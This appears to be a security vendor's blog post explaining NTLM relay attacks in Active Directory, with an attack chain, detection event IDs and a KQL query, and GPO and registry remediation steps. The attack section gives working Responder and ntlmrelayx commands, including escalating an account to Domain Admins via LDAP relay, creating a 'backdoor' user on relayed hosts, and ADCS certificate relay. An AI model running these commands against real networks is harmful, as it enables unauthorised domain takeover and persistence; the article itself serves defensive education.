๐ŸขActive DirectoryNetworkConfigAttack Paths

NTLM Relay Attacks: Hijacking Authentication Without Cracking Passwords

NTLM relay lets attackers intercept authentication and impersonate users across the network without cracking passwords. Learn how the attack works and how to eliminate the exposure.

ES
EtcSec Security Team
4 min read
NTLM Relay Attacks: Hijacking Authentication Without Cracking Passwords

What Is NTLM Relay?

NTLM relay is one of the most reliable network-level attack techniques in Active Directory environments. It exploits the challenge-response mechanism of NTLM authentication to capture authentication attempts from victims and relay them โ€” in real time โ€” to other services, authenticating as the victim without ever cracking their password.

The attack requires only network access to the target segment. No credentials, no domain account, no exploits. In many internal networks, it leads directly to administrative access on dozens of machines within minutes of gaining initial access.

The root cause combines three factors: NTLM is still widely used, SMB signing is disabled on most workstations, and legacy protocols like LLMNR and NBT-NS allow attackers to intercept authentication attempts by responding to broadcast queries.

How It Works

NTLM uses a three-message challenge-response:

  1. Client sends NEGOTIATE message
  2. Server sends CHALLENGE (a random nonce)
  3. Client sends AUTHENTICATE (NTLM hash applied to the nonce)

In a relay attack, the attacker sits between client and server, forwarding messages to a target service. The target believes it is authenticating a legitimate user โ€” because it receives a valid NTLM response, just relayed from another source.

Victims are coerced into sending authentication via LLMNR/NBT-NS poisoning (broadcast name resolution) or print spooler coercion (SpoolSample), forcing machines to authenticate to the attacker's listener.

The Attack Chain

Step 1 - Enable Relay Infrastructure

# Responder โ€” poison LLMNR/NBT-NS (disable SMB/HTTP to avoid capturing, focus on relay)
responder -I eth0 -rdw --no-HTTP-Server --no-SMB-Server

# ntlmrelayx โ€” relay to target list
ntlmrelayx.py -tf targets.txt -smb2support -socks

Step 2 - Capture and Relay Authentication

When any machine queries a non-existent hostname via broadcast, Responder intercepts and forwards auth to ntlmrelayx:

# Output when relay succeeds:
# [*] Authenticating against smb://10.10.0.50 as CORP/jsmith SUCCEED

Step 3 - Exploit to High-Value Targets

# Relay to LDAP โ€” escalate attacker account to Domain Admins
ntlmrelayx.py -t ldap://dc01.corp.local --escalate-user attacker

# Relay to SMB โ€” execute commands as victim
ntlmrelayx.py -tf targets.txt -smb2support -c "net user backdoor P@ss! /add"

# Relay to ADCS web enrollment (ESC8)
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp --adcs --template Machine

Step 4 - Domain Escalation

LDAP relay to a DC escalates directly to Domain Admin. ADCS relay yields a machine certificate for Kerberos authentication โ€” full domain access.

Detection

Windows Event IDs

Event IDSourceWhat to Look For
4624 (Type 3)TargetNetwork logon from unexpected source IP
4776DCNTLM credential validation โ€” watch for NTLMv1
4625TargetFailed logon from relay failures

SIEM Detection Query (Elastic KQL)

event.code: "4624" AND
winlog.event_data.LogonType: "3" AND
winlog.event_data.AuthenticationPackageName: "NTLM" AND
NOT winlog.event_data.WorkstationName: (winlog.event_data.TargetServerName OR "*DC*")

๐Ÿ’ก Tip: NTLM relay leaves a distinct pattern: same account authenticating to multiple machines in a short window from an unusual source IP. Correlate Type 3 logons with network topology.

Remediation

๐Ÿ’ก Quick Win: Enable SMB signing on all workstations via GPO. This single change makes SMB relay impossible.

1. Enable SMB Signing

# GPO: Security Options
# "Microsoft network server: Digitally sign communications (always)" = Enabled
# "Microsoft network client: Digitally sign communications (always)" = Enabled

# Verify
Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters" -Name RequireSecuritySignature
# Should return 1

2. Disable LLMNR and NBT-NS

# Disable LLMNR via GPO:
# Computer Configuration > Administrative Templates > Network > DNS Client
# "Turn off multicast name resolution" = Enabled

# Disable NetBIOS over TCP/IP
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_*" `
    -Name NetbiosOptions -Value 2

3. Enforce NTLMv2 Only

Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name LmCompatibilityLevel -Value 5

4. Enable LDAP Signing on DCs

Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" `
    -Name "LDAPServerIntegrity" -Value 2

How EtcSec Detects This

EtcSec audits network-level authentication settings that enable or prevent NTLM relay.

NTLMV1_ALLOWED identifies domains where NTLMv1 is still permitted โ€” the weakest NTLM version, easiest to relay and crack.

WDIGEST_ENABLED flags cleartext credential caching that compounds the impact of any relay-based credential theft.

Network checks also evaluate SMB signing, LDAP signing requirements, and NTLM restriction policies โ€” the controls that together make relay attacks infeasible.

โ„น๏ธ Note: EtcSec audits network authentication security in every AD scan. Run a free audit to identify NTLM relay exposure.

Related articles: ADCS Certificate Attacks | AD Password Security

๐Ÿข Active DirectoryNetworkConfigAttack Paths
EtcSec

ยฉ 2026 EtcSec. All rights reserved.

NTLM Relay Attacks: Detection and Prevention | EtcSec โ€” EtcSec Blog | EtcSec